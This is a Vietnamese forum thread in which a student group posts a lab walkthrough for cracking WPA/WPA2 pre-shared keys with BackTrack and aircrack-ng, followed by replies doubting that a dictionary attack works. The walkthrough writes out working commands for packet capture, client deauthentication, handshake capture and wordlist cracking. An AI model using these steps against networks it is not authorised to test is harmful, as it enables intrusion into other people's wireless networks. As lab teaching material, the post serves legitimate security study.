PDA

View Full Version : LAB: Khóa Wpa Trong Mạng Wlan



tranmyphuc1988
23-05-2008, 23:08
LAB: ** KHÓA WPA TRONG MẠNG WLAN để xem các bạn vui lòng thay ******* = c r a c k (viết dính liền) hoặc vào : http://wimaxpro.org/forum/showthread.php?p=1139#post1139

Nhóm thực tập: GTVT



THIẾT BỊ :
vMột AP làm AP target
vMột PC có card wireless làm client target.
vMột PC có card wireless làm attacker
vMột đĩa CD backtrack 3.0 beta

YÊU CẦU:
vĐể ******* được wpa thì yêu cầu phải có môi trường cơ sở dữ liệu SQLite. Ta có thể download SQLite tại http://www.sqlite.org/sqlite-3.5.7.tar.gz .
vMột list chứa các password, list này phải đảm bảo có chứa khoá của mạng mà ta cần hack
vMột list chứa các ssid, list này phải đảm bảo có chứa ssid của AP target.
Bài lab này sẽ tiến hành ******* các loại khoá là WPA PERSONAL TKIP, WPA PERSONAL AES, WPA2 AES và WPA2 TKIP+AES.

CÁC BƯỚC TIẾN HÀNH *****:
vCÀI ĐẶT SQLite như sau:
tar xvzf /root/Desktop/sqlite/sqlite-3.5.7.tar.gz
cd sqlite-3.5.7
./configure --prefix=/usr/local
Make

******* WPA TKIP:
·Chuyển card wireless về monitor mode như hình sau:

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/******_WAP/1.jpg (http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/******_WAP/1.jpg)
• Dò tìm kênh và MAC address của AP target và client target bằng lệnh airodump-ng ath0 , kết quả dò tìm như hình sau:

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/2_0.jpg

• Tiến hành bắt gói trên kênh và MAC address của AP target vừa tìm được bằng lệnh:
airodump-ng –c 1 –w/root/desktop/capture/wpa –bssid 00:14:bf:05: d6:0c ath0

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/2.jpg

• Tiếp theo, ta dùng tool aireplay và MAC address của client target để tạo ra 4 bước bắt tay với AP target :
Aireplay-ng -0 1 –a 00:14:bf:05: d6:0c –c 00:16:b6:99:74:78 ath0

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/3.jpg

• Quay lại màn hình bắt gói airodump quan sát ta thấy quá trình bắt tay đã diễn ra như hình sau:

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/4.jpg

Thế là ta đã capture được 4 bước bắt tay với AP target.
• Dùng tool airolib-ng để tạo cơ sở dữ liệu cho quá trình ************************************************** ************************************************ bằng lệnh airolib-ng vnpro_gtvt_hcm init
với vnpro_gtvt_hcm là tên của cơ sở dữ liệu được chứa mặc định trong home folder.
Sau đó, ta import các list password và list ssid vào cơ sỡ dữ liệu vnpro_gtvt_hcm như sau:
Airolib-ng vnpro_gtvt_hcm import ascii essid dictionary.txt
/* với dictionary.txt là list chứa tên các ssid */

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/5.jpg

Airolib-ng vnpro_gtvt_hcm import ascii passwd password.lst
/* với password.lst là file chứa các password */

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/6.jpg

• Ta kết hợp các ssid với password với nhau sau khi import thành công list password và list ssid bằng lệnh:
Airolib-ng vnpro_gtvt_hcm batch
kiểm tra lại số ssid và password hợp lệ mà ta có bằng lệnh sau:
Airolib-ng vnpro_gtvt_hcm stats

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/7.jpg

• mở một shell mới chạy tool aircrack-ng để tìm khoá :
aircrack-ng –r vnpro_gtvt_hcm /root/desktop/capture/wpa*.cap

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/8.jpg

Sau khi lệnh thực hiện xong, ta thu được key

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/9.jpg

Quá trình ************************************************** ************************************************ khoá WPA AES, WPA2 AES và WPA2 TKIP+AES bao gồm các bước thực hiện hoàn toàn như việc ************************************************** ************************************************ WPA TKIP. Tiếp theo, ta chỉ kiểm tra quá trình tìm ra khoá của các loại khoá trên

************************************************** ************************************************ WAP AES

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/10.jpg

Khoá tìm được :

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/11.jpg

************************************************** ************************************************ WPA2 AES

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/12.jpg

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/13.jpg

************************************************** ************************************************ WPA2 TKIP+AES

Chạy lệnh tool aircrack để tìm key
http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/14.jpg

Tìm được key là vnprogtvthcmtkipvaaes (vnpro gtvt hcm tkip và aes)

http:///www.wimaxpro.org/Hinh_upload/Wifipro/GTVT/************************************************** ************************************************_W AP/15.jpg

Chúc mọi người vui !!!

tềthiên
24-05-2008, 10:29
Vô ích thôi:


YÊU CẦU:
vĐể ************************* được wpa thì yêu cầu phải có môi trường cơ sở dữ liệu SQLite. Ta có thể download SQLite tại http://www.sqlite.org/sqlite-3.5.7.tar.gz .
vMột list chứa các password, list này phải đảm bảo có chứa khoá của mạng mà ta cần hack
vMột list chứa các ssid, list này phải đảm bảo có chứa ssid của AP target.
Bài lab này sẽ tiến hành ************************* các loại khoá là WPA PERSONAL TKIP, WPA PERSONAL AES, WPA2 AES và WPA2 TKIP+AES.

Với yêu cầu này thì bó tay.

Target_Locked
18-06-2008, 12:43
hay nhỉ, hack mà đòi phải biết trước khóa thì hack làm gì? :D

wanttolove
13-07-2008, 18:24
! 1 file chứa 1 password mà ta cần hack thôi , đừng có chưa nhiều quá :))

camtreo1402
23-02-2009, 15:20
Theo mình thì chỉ có cách hack như trên thì mới biết được pass, nhưng ở đây xác suất thành công chỉ khoảng <5% chứ không nhiều tại vì nếu AP đặt pass bằng tiếng anh thì xác xuất thành công sẽ cao hơn một tí do list password.txt bằng từ vựng anh văn. còn nếu Ap đặt pass bằng tiếng việt không dấu thì xác xuất thành công của bạn chỉ bằng 1% thôi. trừ khi bạn quen người nhà đó biết tên tuổi, ngày tháng năm sinh hoặc sở thích của họ..
Cái cần nhất để Hack mạng wifi là list chứa pass như cách hack ở trên để hack mạng khóa WPA, WPA2